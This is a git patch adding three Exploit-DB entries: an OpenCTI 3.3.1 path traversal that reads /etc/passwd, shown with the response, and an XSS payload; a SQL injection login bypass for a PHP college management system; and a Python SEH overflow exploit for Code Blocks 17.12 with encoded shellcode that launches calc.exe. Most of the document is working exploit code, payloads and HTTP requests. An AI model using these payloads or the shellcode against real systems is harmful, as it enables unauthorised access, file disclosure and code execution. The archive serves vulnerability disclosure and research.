From 7312a8330de86e9097f803ce5b42df072b01855d Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 18 Jun 2020 05:01:57 +0000
Subject: [PATCH] DB: 2020-06-18

3 changes to exploits/shellcodes

Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)
College-Management-System-Php 1.0 - Authentication Bypass
OpenCTI 3.3.1 - Directory Traversal
---
 exploits/multiple/webapps/48595.txt | 100 ++++++++++++++++++++++++++
 exploits/php/webapps/48593.txt      |  35 +++++++++
 exploits/windows/local/48594.py     | 108 ++++++++++++++++++++++++++++
 files_exploits.csv                  |   3 +
 4 files changed, 246 insertions(+)
 create mode 100644 exploits/multiple/webapps/48595.txt
 create mode 100644 exploits/php/webapps/48593.txt
 create mode 100755 exploits/windows/local/48594.py

diff --git a/exploits/multiple/webapps/48595.txt b/exploits/multiple/webapps/48595.txt
new file mode 100644
index 000000000..e0462aaf9
--- /dev/null
+++ b/exploits/multiple/webapps/48595.txt
@@ -0,0 +1,100 @@
+# Exploit Title: OpenCTI 3.3.1 - Directory Traversal
+# Date: 2020-03-05
+# Exploit Author: Raif Berkay Dincel
+# Vendor Homepage: www.opencti.io/
+# Software [https://github.com/OpenCTI-Platform/opencti/releases/tag/3.3.1]
+# Version: [3.3.1]
+# CVE-ID: N/A
+# Tested on: Linux Mint / Windows 10
+# Vulnerabilities Discovered Date : 2020/03/05 [YYYY/MM/DD]
+
+# As a result of the research, two vulnerability were identified. (Directory Traversal & Cross Site Scripting [XSS])
+# Technical information is provided below step by step.
+
+# [1] - Directory Traversal Vulnerability
+
+# Vulnerable Parameter Type: GET
+# Vulnerable Parameter: TARGET/static/css/[Payload]
+
+# Proof of Concepts:
+https://TARGET/static/css//../../../../../../../../etc/passwd
+
+# HTTP Request:
+
+GET /static/css//../../../../../../../../etc/passwd HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: connect.sid=s%3ATkG_XOPI-x4FclzoLAZvx_oBEHaTkG4N.kwp3h9LAyBrG03SzzT8ApZu0CRaUwI5CP7yizXTerYM; opencti_token=df8635b1-39b5-41c2-8873-2f19b0e6ca8c
+Upgrade-Insecure-Requests: 1
+
+# HTTP Response
+
+HTTP/1.1 200 OK
+X-DNS-Prefetch-Control: off
+X-Frame-Options: SAMEORIGIN
+Strict-Transport-Security: max-age=15552000; includeSubDomains
+X-Download-Options: noopen
+X-Content-Type-Options: nosniff
+X-XSS-Protection: 1; mode=block
+Content-Type: text/css; charset=utf-8
+ETag: W/"500-eiHlcjY0lWovE9oQsRof3WWtG1o"
+Vary: Accept-Encoding
+Date: Sun, 03 May 2020 01:25:21 GMT
+Connection: close
+Content-Length: 1280
+
+root:x:0:0:root:/root:/bin/ash
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+adm:x:3:4:adm:/var/adm:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+news:x:9:13:news:/usr/lib/news:/sbin/nologin
+uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
+operator:x:11:0:operator:/root:/sbin/nologin
+man:x:13:15:man:/usr/man:/sbin/nologin
+postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
+cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
+ftp:x:21:21::/var/lib/ftp:/sbin/nologin
+sshd:x:22:22:sshd:/dev/null:/sbin/nologin
+at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
+squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
+xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
+games:x:35:35:games:/usr/games:/sbin/nologin
+postgres:x:70:70::/var/lib/postgresql:/bin/sh
+cyrus:x:85:12::/usr/cyrus:/sbin/nologin
+vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
+ntp:x:123:123:NTP:/var/empty:/sbin/nologin
+smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
+guest:x:405:100:guest:/dev/null:/sbin/nologin
+nobody:x:65534:65534:nobody:/:/sbin/nologin
+node:x:1000:1000:Linux User,,,:/home/node:/bin/sh
+
+
+# [2] - Cross Site Scripting (XSS) Vulnerability
+
+# Vulnerable Parameter Type: GET
+# Vulnerable Parameter: TARGET/graphql?[Payload]
+
+# Proof of Concepts:
+TARGET/graphql?'"--></style></scRipt><scRipt>alert('Raif_Berkay')</scRipt>
+
+https://TARGET/graphql?%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%27Raif_Berkay%27)%3C/scRipt%3E
+
+# HTTP Request:
+
+GET /graphql?'"--></style></scRipt><scRipt>alert('Raif_Berkay')</scRipt> HTTP/1.1
+Host: TARGET
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-us,en;q=0.5
+Cache-Control: no-cache
+Cookie: opencti_token=2b4f29e3-5ea8-4890-8cf5-a76f61f1e2b2; connect.sid=s%3AB8USExilsGXulGOc09fo92piRjpWNtUo.GZ9pmhOf7i1l78t%2BHVk9zh9AQ9BTO%2BHvCRix3iXv6iw
+User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
\ No newline at end of file
diff --git a/exploits/php/webapps/48593.txt b/exploits/php/webapps/48593.txt
new file mode 100644
index 000000000..030e45e0c
--- /dev/null
+++ b/exploits/php/webapps/48593.txt
@@ -0,0 +1,35 @@
+# Exploit Title: College-Management-System-Php 1.0 - Authentication Bypass / SQL Injection
+# Exploit Author: BLAY ABU SAFIAN (Inveteck Global)
+# Website: https://github.com/olotieno/College-Management-System-Php
+# Date: 2020-06-16
+# Google Dork: N/A
+# Vendor: https://github.com/olotieno/
+# Software Link: https://github.com/olotieno/College-Management-System-Php.git
+# Affected Version: N/A
+# Patched Version: unpatched
+# Category: Web Application
+# Tested on: MAC
+
+The College Management System Php suffers from sql injection vulnerabilities in the index.php page:
+
+$msg="";
+if(isset($_POST['btn_log'])){
+  $uname=$_POST['unametxt'];
+  $pwd=$_POST['pwdtxt'];
+
+  $sql=mysqli_query($con,"SELECT * FROM users_tbl
+              WHERE username='$uname' AND password='$pwd'
+
+SQL injection vulnerability:-
+in file index.php data from POST parameter 'unametxt' and 'pwdtxt' are not getting filter before passing into SQL query and hence rising SQL Injection vulnerability
+
+payload:
+' or 1=1 --
+
+
+
+Thank you
+
+regards
+Abu Safian Blay
+https://inveteckglobal.com<http://inveteckglobal.com>
\ No newline at end of file
diff --git a/exploits/windows/local/48594.py b/exploits/windows/local/48594.py
new file mode 100755
index 000000000..11992f74c
--- /dev/null
+++ b/exploits/windows/local/48594.py
@@ -0,0 +1,108 @@
+# Exploit Title: Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC) 
+# Vendor Homepage: http://www.codeblocks.org/ 
+# Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/17.12/Windows/codeblocks-17.12-setup.exe/download
+# Exploit Author: Paras Bhatia
+# Discovery Date: 2020-06-16
+# Vulnerable Software: Code Blocks
+# Version: 17.12
+# Vulnerability Type: Local Buffer Overflow
+# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)  
+
+#Steps to Produce the Crash:
+
+#   1.- Run python code: codeblocks.py
+#   2.- Copy content to clipboard
+#   3.- Turn off DEP for codeblocks.exe
+#   4.- Open "codeblocks.exe"
+#   5.- Go to "File" > "New" > "Project..."
+#   6.- Click on "Files" from left box > Select "C/C++ header" > Clickon "Go" > Click on "Next"
+#   7.- Paste ClipBoard into the "Filename with fullpath:" .
+#   8.- Click on "Finish".
+#   9.- Calc.exe runs.
+
+
+#################################################################################################################################################
+
+#Python "codeblocks.py" Code:
+
+f= open("codeblocks.txt", "w")
+
+junk1="A" * 2006
+
+
+nseh="\x61\x62"             #popad / align
+
+
+#Found pop edi - pop ebp - ret at 0x005000E0 [codeblocks.exe] ** Unicode compatible **  ** Null byte ** [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:\Program Files\CodeBlocks\codeblocks.exe
+seh="\xe0\x50" 
+
+ven = "\x62"                #align
+ven +="\x53"                #push ebx
+ven += "\x62"               #align
+ven += "\x58"               #pop eax
+ven += "\x62"               #align
+ven += "\x05\x14\x11"       #add eax, 0x11001400
+ven += "\x62"               #align
+ven += "\x2d\x13\x11"       #sub eax, 0x11001300
+ven += "\x62"               #align
+
+ven += "\x50"               #push eax
+ven += "\x62"               #align
+ven += "\xc3"               #ret
+
+junk2="\x41" * 108          #required to make sure shellcode = eax
+
+#msfvenom -p windows/exec cmd=calc.exe --platform windows -f py -e x86/unicode_mixed BufferRegister=EAX
+buf =  ""
+buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
+buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
+buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
+buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
+buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
+buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
+buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
+buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
+buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
+buf += "\x47\x42\x39\x75\x34\x4a\x42\x59\x6c\x48\x68\x71\x72"
+buf += "\x69\x70\x4b\x50\x49\x70\x73\x30\x53\x59\x69\x55\x50"
+buf += "\x31\x49\x30\x33\x34\x62\x6b\x62\x30\x50\x30\x74\x4b"
+buf += "\x42\x32\x6a\x6c\x62\x6b\x30\x52\x6d\x44\x74\x4b\x52"
+buf += "\x52\x6c\x68\x5a\x6f\x34\x77\x6f\x5a\x4e\x46\x50\x31"
+buf += "\x6b\x4f\x74\x6c\x4f\x4c\x6f\x71\x31\x6c\x6d\x32\x4c"
+buf += "\x6c\x6f\x30\x56\x61\x66\x6f\x6a\x6d\x4b\x51\x69\x37"
+buf += "\x67\x72\x48\x72\x42\x32\x6f\x67\x72\x6b\x52\x32\x5a"
+buf += "\x70\x72\x6b\x70\x4a\x4d\x6c\x32\x6b\x6e\x6c\x5a\x71"
+buf += "\x64\x38\x7a\x43\x31\x38\x4b\x51\x36\x71\x42\x31\x34"
+buf += "\x4b\x30\x59\x4b\x70\x39\x71\x79\x43\x62\x6b\x6d\x79"
+buf += "\x6b\x68\x6a\x43\x6c\x7a\x70\x49\x62\x6b\x50\x34\x52"
+buf += "\x6b\x59\x71\x69\x46\x4c\x71\x79\x6f\x34\x6c\x65\x71"
+buf += "\x46\x6f\x4c\x4d\x7a\x61\x76\x67\x70\x38\x6b\x30\x30"
+buf += "\x75\x6c\x36\x79\x73\x63\x4d\x49\x68\x6d\x6b\x31\x6d"
+buf += "\x6f\x34\x63\x45\x67\x74\x6e\x78\x54\x4b\x72\x38\x6c"
+buf += "\x64\x4b\x51\x77\x63\x71\x56\x74\x4b\x6a\x6c\x6e\x6b"
+buf += "\x64\x4b\x32\x38\x4b\x6c\x6a\x61\x38\x53\x74\x4b\x6b"
+buf += "\x54\x34\x4b\x4a\x61\x68\x50\x44\x49\x4e\x64\x6f\x34"
+buf += "\x4c\x64\x51\x4b\x4f\x6b\x53\x31\x6e\x79\x71\x4a\x32"
+buf += "\x31\x79\x6f\x69\x50\x4f\x6f\x4f\x6f\x4f\x6a\x64\x4b"
+buf += "\x6e\x32\x58\x6b\x54\x4d\x6f\x6d\x30\x6a\x4b\x51\x64"
+buf += "\x4d\x45\x35\x55\x62\x49\x70\x4d\x30\x4d\x30\x72\x30"
+buf += "\x73\x38\x4d\x61\x52\x6b\x72\x4f\x54\x47\x79\x6f\x66"
+buf += "\x75\x75\x6b\x68\x70\x35\x65\x45\x52\x6f\x66\x4f\x78"
+buf += "\x73\x76\x56\x35\x75\x6d\x35\x4d\x79\x6f\x69\x45\x4d"
+buf += "\x6c\x79\x76\x43\x4c\x6b\x5a\x45\x30\x59\x6b\x57\x70"
+buf += "\x34\x35\x49\x75\x57\x4b\x6e\x67\x4e\x33\x32\x52\x52"
+buf += "\x4f\x71\x5a\x49\x70\x51\x43\x6b\x4f\x69\x45\x62\x43"
+buf += "\x43\x31\x52\x4c\x33\x33\x4e\x4e\x31\x55\x31\x68\x53"
+buf += "\x35\x6d\x30\x41\x41"
+
+
+
+
+junk3 = "\x62" * 5000  #padding to crash
+
+
+
+payload = junk1 + nseh + seh + ven + junk2 + buf +junk3
+
+f.write(payload)
+f.close
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index cc0ec866d..f01140a68 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11095,6 +11095,7 @@ id,file,description,date,author,type,platform,port
 48573,exploits/windows/local/48573.txt,"WinGate 9.4.1.5998 - Insecure Folder Permissions",2020-06-10,hyp3rlinx,local,windows,
 48579,exploits/windows/local/48579.py,"Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC)",2020-06-11,"Paras Bhatia",local,windows,
 48591,exploits/windows/local/48591.txt,"Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path",2020-06-16,boku,local,windows,
+48594,exploits/windows/local/48594.py,"Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)",2020-06-17,"Paras Bhatia",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42811,3 +42812,5 @@ id,file,description,date,author,type,platform,port
 48582,exploits/multiple/webapps/48582.txt,"Sysax MultiServer 6.90 - Reflected Cross Site Scripting",2020-06-12,"Luca Epifanio",webapps,multiple,
 48588,exploits/hardware/webapps/48588.py,"Netgear R7000 Router - Remote Code Execution",2020-06-15,grimm-co,webapps,hardware,
 48590,exploits/php/webapps/48590.py,"Gila CMS 1.11.8 - 'query' SQL Injection",2020-06-16,BillyV4,webapps,php,
+48593,exploits/php/webapps/48593.txt,"College-Management-System-Php 1.0 - Authentication Bypass",2020-06-17,"BLAY ABU SAFIAN",webapps,php,
+48595,exploits/multiple/webapps/48595.txt,"OpenCTI 3.3.1 - Directory Traversal",2020-06-17,"Raif Berkay Dincel",webapps,multiple,